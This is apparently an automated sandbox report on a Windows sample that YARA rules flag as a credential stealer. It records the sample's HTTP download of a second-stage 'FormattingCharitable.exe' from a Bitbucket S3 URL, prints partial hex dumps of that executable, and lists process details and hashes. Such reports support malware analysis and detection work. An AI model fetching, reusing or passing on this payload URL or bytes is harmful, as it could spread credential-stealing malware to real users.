                                                                                                                                                                                                                                                                        2024-12-23 07:41:05 UTC1364OUTGET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIZ7XL2U7&Signature=FCPVgbdRXx%2FDjhvQvPzU1dQ3dNE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQDOJENS5X8jDlzsJxuPb2pH5MjLxA952GUpuJ9K8c8eAgIgeBp5O3n2dCArHo7VZBQEhKa5Ybqf7xD1F%2BZzGAepczwqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDIf5Q5o38rOF7VorZiqEApSlSAviV7fqKWYqWG4d0%2BlfrC%2FFb7F%2Fc2GVH68DYRo2vd%2BAREXXJpsY5s%2BmBpFXzm6fy26oRa5GS8wZd9Nc0FYJUoSZjhvzo%2FM%2FM6PUw%2FINg1gRCi7PRFdMEoNyTOkNSC2S8%2FTK1pGG4o8hZEeM8vyBsvr0QE%2FuOcUu5JrCscWEP%2BFIPyeSmLpATVuvDiwsooP38cS3cC5Mhjir0zJP2xZUtK%2BDRPz%2BgACYHXpemn2WCxpgImxr6YWsOyoQOhLS0ii2eBVVjZpJNT1ozD%2FkBPjRAjUAEFa5C8b6hC%2FuETQ%2BEKayEkNgfTaLoNER0YYk%2BLdQYmqD3E5OEWQc3mClPsl8QceiMMSmpLsGOp0BepAG7qOdA1hoVp77QSvDNIy85cM9X4QKinihkh90Gdln%2FwS%2BMi4ynXs5fFObnXard%2B5fkTffWOZz4AAnQ1g4%2FaEEJTRdstxSXhoxukE9KAy [TRUNCATED]
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                                                                        2024-12-23 07:41:06 UTC554INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        x-amz-id-2: BcyhFs/eZ8uzMGv6Ui5sRxLCg7kAi6z/sIzGxcF3GSwIww+fRnjSQDIqtmVMLFYp6ClCqxYOlhw=
                                                                                                                                                                                                                                                                        x-amz-request-id: QSTQ00AY5WD3X4G3
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:41:06 GMT
                                                                                                                                                                                                                                                                        Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
                                                                                                                                                                                                                                                                        ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                        x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="FormattingCharitable.exe"
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                                                                                                        Content-Length: 1325507
                                                                                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-23 07:41:06 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00
                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
                                                                                                                                                                                                                                                                        2024-12-23 07:41:06 UTC470INData Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39
                                                                                                                                                                                                                                                                        Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
                                                                                                                                                                                                                                                                        2024-12-23 07:41:06 UTC16384INData Raw: 07 50 ff 15 30 91 40 00 89 1d 68 1d 44 00 89 1d 6c 1d 44 00 89 1d 10 eb 47 00 81 7d 0c 0f 04 00 00 0f 85 4b 01 00 00 53 53 e8 f4 c3 ff ff 39 5d 10 74 07 6a 08 e8 0d c6 ff ff 39 5d 14 74 3f ff 35 6c 1d 44 00 e8 d1 c4 ff ff 8b f8 57 e8 7e c4 ff ff 33 c0 33 c9 3b fb 7e 0e 8b 55 e4 39 1c 82 74 01 41 40 3b c7 7c f2 53 51 68 4e 01 00 00 ff 75 f8 ff d6 89 7d 14 c7 45 0c 20 04 00 00 53 53 e8 9d c3 ff ff a1 6c 1d 44 00 89 45 e0 a1 c8 ea 47 00 c7 45 c4 30 f0 00 00 89 5d e8 39 1d cc ea 47 00 0f 8e a1 00 00 00 8d 78 08 8b 45 e0 8b 4d e8 8b 04 88 3b c3 74 79 8b 0f 89 45 bc c7 45 b8 08 00 00 00 f7 c1 00 01 00 00 74 13 8d 47 10 c7 45 b8 09 00 00 00 89 45 c8 81 27 ff fe ff ff f6 c1 40 74 05 6a 03 58 eb 0e 8b c1 83 e0 01 40 f6 c1 10 74 03 83 c0 03 ff 75 bc 8b d1 c1 e0 0b
                                                                                                                                                                                                                                                                        Data Ascii: P0@hDlDG}KSS9]tj9]t?5lDW~33;~U9tA@;|SQhNu}E SSlDEGE0]9GxEM;tyEEtGEE'@tjX@tu
                                                                                                                                                                                                                                                                        2024-12-23 07:41:06 UTC1024INData Raw: 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 65 00 6d 00 70 00 74 00 79 00 00 00 00 00 45 00 78 00 63 00 68 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 3c 00 20 00 25 00 64 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 73 00 00 00 52 00 4d 00 44 00 69 00 72 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 42 00 6f 00 78 00 3a 00 20 00 25 00 64 00 2c 00 22 00 25 00 73 00 22 00 00 00 44 00 65 00 6c 00 65 00 74 00 65 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 25 00 73 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 77 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 74 00 6f 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 65 00 72 00 72 00 6f 00 72 00 2c 00 20
                                                                                                                                                                                                                                                                        Data Ascii: : stack emptyExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"%sFile: wrote %d to "%s"File: error,
                                                                                                                                                                                                                                                                        2024-12-23 07:41:06 UTC16384INData Raw: 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 2d 00 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 25 00 64 00 29 00 00 00 00 00 53 00 65 00 74 00 46 00 69 00 6c 00 65 00 41 00 74 00 74 00 72
                                                                                                                                                                                                                                                                        Data Ascii: : can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (%d)SetFileAttr
                                                                                                                                                                                                                                                                        2024-12-23 07:41:06 UTC1024INData Raw: 08 ce 07 cd e8 df bf 7f 82 30 a8 57 9f 88 81 3d 7b 87 3d 3d 76 58 69 b7 f9 13 7f db ed 8d 09 ff d1 73 ec 8b 65 98 86 79 fa f2 e6 7a 40 df be 7d 13 00 c6 9f 7d d6 c6 c5 d3 9f bd 88 67 9e 79 a6 55 d8 60 c7 f7 ec d9 33 01 60 5c 47 a6 5b cd 7f e2 89 27 e2 d9 70 26 00 8c b7 95 47 1f 7d f4 b2 e0 c6 c1 45 74 eb f6 70 d4 93 0f 3e 19 33 fc 91 21 b5 53 9e 9a f0 a7 89 3d c7 fd f9 b9 47 fb d5 3d d8 fd c1 98 ae dd ba 46 61 19 36 81 6d 82 8d 5a 6b 24 e8 b0 e9 32 89 07 dc 28 8c e3 f9 71 fc 19 ab c3 26 31 9a 3f 0f f1 32 5e 6c 78 b6 b7 6f df 7e f9 cf 7e f6 b3 79 d0 16 d6 18 9c 2a c0 a9 01 31 01 72 f1 e5 c3 8c 98 00 68 15 34 0b da 65 75 2a 00 5a f7 c3 30 00 fd 37 1c 19 f4 dc ba 7a df 7e 6b ea f7 0d 5c 53 89 1d be 9a 03 0a 41 5a ff 28 18 ab ae 7f 5c 61 89 8b 2c 70 a5 3f ba
                                                                                                                                                                                                                                                                        Data Ascii: 0W={==vXiseyz@}}gyU`3`\G['p&G}Etp>3!S=G=Fa6mZk$2(q&1?2^lxo~~y*1rh4eu*Z07z~k\SAZ(\a,p?
                                                                                                                                                                                                                                                                        2024-12-23 07:41:06 UTC1749INData Raw: db d6 0c 99 2f df b7 6f df ae d0 97 b9 12 64 7d e6 7a e5 7f e5 bf f5 ef 3a b2 dd 82 be af 40 ca 40 ca 05 65 85 f2 43 59 a2 7c d9 20 71 99 2f 27 36 0c c4 86 41 21 e3 6c b2 88 cd 83 e2 bd f7 de 53 98 df 4d d8 64 34 03 c7 d9 0a 36 21 cd 90 7a e1 08 a9 3f 26 66 3d 33 eb a3 59 6f cd 7a 2e 48 1c 98 71 62 62 c6 99 19 87 82 19 af 12 c7 12 df 8a 99 1c f3 af 4c a7 59 d3 67 d0 ac 19 b6 7c f0 ca f4 57 88 8d 0b 21 af e8 4c 9e 3c b9 19 6c 4e 2c 61 93 d2 08 1b 15 e2 1c a5 c6 f1 1b 36 40 6d 5e 9f be 1e 80 f5 58 c1 c6 a6 19 dc 08 52 b0 d9 69 06 e7 4b 4b d8 cc 28 d8 bc 34 83 cd 8b 82 4d 8b 25 6c 62 14 c3 86 0d a3 a1 c3 87 d2 d0 61 43 69 cc 8b a3 69 da f3 93 68 76 5f 2e d3 9e 36 03 30 72 c0 70 1a f2 e2 10 7a e1 c5 17 88 f3 36 b1 99 69 06 9b 17 05 9b 1a 85 7c 67 d3 a2 60 d3
                                                                                                                                                                                                                                                                        Data Ascii: /od}z:@@eCY| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.60rpz6i|g`
                                                                                                                                                                                                                                                                        2024-12-23 07:41:06 UTC9000INData Raw: 41 04 45 04 48 10 01 14 4c 23 e0 c8 10 08 ba 19 d0 d1 c5 f9 4a b0 5a b7 15 b2 3d cd b7 db de 5d bf 89 5b fc 9b 9d 68 db 96 0d b4 67 e3 db b4 67 c3 02 da ba 7e 19 ad 5b bf 81 d6 ae 6b de 7a 17 74 31 c5 38 ca 04 42 bf 73 e7 ce 46 03 00 f0 5d 4e 49 c0 b0 60 5b d4 7f da cd 85 ac 5b d6 27 c7 c3 c4 3c 5e e6 74 a0 7a 7b 98 b5 7c bc 37 b1 b8 82 75 38 ee f6 e9 6a 19 7b 3d 50 62 6e 67 2d 0b f5 86 95 dc fa df b0 91 de 75 da a3 58 c5 fb be 01 46 80 d7 21 3d 04 8a ab 24 f0 82 59 9f 05 5d e0 ad d0 7b 0b 00 7a 01 10 37 88 65 3d 77 58 09 bb 88 bb 15 66 f7 34 7e 8b 75 8a 01 b0 12 79 9d d6 84 5e 30 85 5e 84 5b 04 be 35 a1 37 05 5e be 9b c8 f2 92 4f 80 be 1d d8 46 d9 ee c6 cf 77 f9 f3 5d db 27 10 73 23 06 48 7a 61 a4 ec e5 78 e8 c7 05 e3 38 8e 38 c6 a8 27 a8 7b 12 3b 66 6e
                                                                                                                                                                                                                                                                        Data Ascii: AEHL#JZ=][hgg~[kzt18BsF]NI`[['<^tz{|7u8j{=Pbng-uXF!=$Y]{z7e=wXf4~uy^0^[57^OFw]'s#Hzax88'{;fn
                                                                                                                                                                                                                                                                        2024-12-23 07:41:06 UTC16384INData Raw: 90 4f 56 90 9a 56 96 c3 2d 79 fb b2 0a 08 37 72 1a 7e 5b 90 4f d9 45 05 94 c5 fb 9c 71 28 8a 32 0e 46 50 66 42 32 cf e3 e5 79 bd ba c0 ab 46 92 d6 50 6a 9c 6e ff de 16 b0 3e e4 45 d4 2b d4 65 d3 00 a0 95 6f 65 00 30 0d a7 01 c4 00 e0 6e 01 5c 00 08 0d 41 4f 00 2e 24 8c 88 88 50 2f 6e 82 e6 f4 eb d7 4f bd 0b a0 05 03 30 8e 75 0a a7 c6 a1 57 d0 2e 68 d8 75 03 60 1f ae ba 01 c0 6b 3a f1 72 0d 04 30 9e e2 f7 cb 5f fd 52 b9 b8 a3 dc 62 2a c8 e4 20 8e 89 a3 b4 e8 58 4a 4f 48 a4 d4 24 0e 60 04 2f 8b bb 04 71 4b 58 99 02 45 3a bb ff c2 24 4a c9 4f a6 82 5d e5 74 94 85 ff a3 76 ff ad 38 fa f4 17 54 b0 b3 9c 52 f3 f9 f7 45 1c f4 99 4d 3d 07 2d 19 00 f9 d4 31 03 55 12 83 98 00 95 d8 8a 99 f2 22 45 61 31 27 b6 02 4e 6c 48 6e 85 f6 a4 56 64 4b 74 e8 09 a8 2e a9 a1 f0
                                                                                                                                                                                                                                                                        Data Ascii: OVV-y7r~[OEq(2FPfB2yFPjn>E+eoe0n\AO.$P/nO0uW.hu`k:r0_Rb* XJOH$`/qKXE:$JO]tv8TREM=-1U"Ea1'NlHnVdKt.
                                                                                                                                                                                                                                                                        2024-12-23 07:41:06 UTC1024INData Raw: 82 a2 79 5a 3a 9b 03 b4 fe f5 73 c1 ba 19 d0 0d 81 18 01 c1 34 02 82 08 98 89 08 9c 89 08 60 6b 98 42 7a a9 58 ad d3 0a 47 db 28 06 c0 11 98 5f 52 54 6a bb e0 af a4 9a 8a 0b b9 45 6f f1 bf fa 3a f5 ef 52 4e 52 8e 52 b6 f8 94 f2 c6 f2 68 fd e3 b9 ff 30 00 38 0d 50 5f 53 4d d5 65 25 54 59 94 4f 0d 55 e5 74 ee f4 09 fa f0 ec 49 3a 51 c7 a2 5f 5a a8 ae 09 a8 a9 28 a5 aa ca 0a 75 11 60 45 05 9e 46 58 a2 fe 0b c7 57 c4 5f 7a 8e a4 f7 08 9f 71 31 f1 14 16 1c 49 c1 fe 61 aa eb 3f fc 50 14 c5 46 e3 c9 7c 5c e7 12 6d f5 4e ea a5 d4 55 b3 1e 4b d7 3e a6 c9 b8 23 c1 17 a4 a5 0f b1 17 11 d6 0d 80 cc 83 d0 22 76 11 e7 2a 17 d8 3f 75 a4 d1 e0 08 f5 4e 79 3b f8 8e dc 80 d8 57 c2 6e 11 df 82 e4 01 47 48 de 68 2b ba 88 eb 98 82 dc 1a 92 bf 4c 24 bf b5 86 f9 3b 3d 4f 02 f9
                                                                                                                                                                                                                                                                        Data Ascii: yZ:s4`kBzXG(_RTjEo:RNRRh08P_SMe%TYOUtI:Q_Z(u`EFXW_zq1Ia?PF|\mNUK>#"v*?uNy;WnGHh+L$;=O


                                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                        Start time:02:40:32
                                                                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\jSFUzuYPG9.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\jSFUzuYPG9.exe"
                                                                                                                                                                                                                                                                        Imagebase:0xc50000
                                                                                                                                                                                                                                                                        File size:2'870'272 bytes
                                                                                                                                                                                                                                                                        MD5 hash:820F418E980B172684FE96E4AA6E50A5
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                        Start time:02:41:08
                                                                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 2140
                                                                                                                                                                                                                                                                        Imagebase:0xdc0000
                                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                          Function 016AF430 Relevance: .3, Instructions: 304COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000003.1499562858.00000000016AD000.00000004.00000020.00020000.00000000.sdmp, Offset: 016A9000, based on PE: false
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000003.1477517093.00000000016A9000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_16a9000_jSFUzuYPG9.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: ccfc26d044cdaa8c38c3cbf5ceca6a61d6ba29d49bdaa5a8d6ead811ad6bcfc4
                                                                                                                                                                                                                                                                          • Instruction ID: 3fc51af0fb16535f555b6614f20dab9f24c933b0621c77baaf863d69a29ebb63
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ccfc26d044cdaa8c38c3cbf5ceca6a61d6ba29d49bdaa5a8d6ead811ad6bcfc4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EEB1EB6254E3C15FE30387344C6AA95BF75AF23614F4E86DBD1C08F4E3D28A494ACB62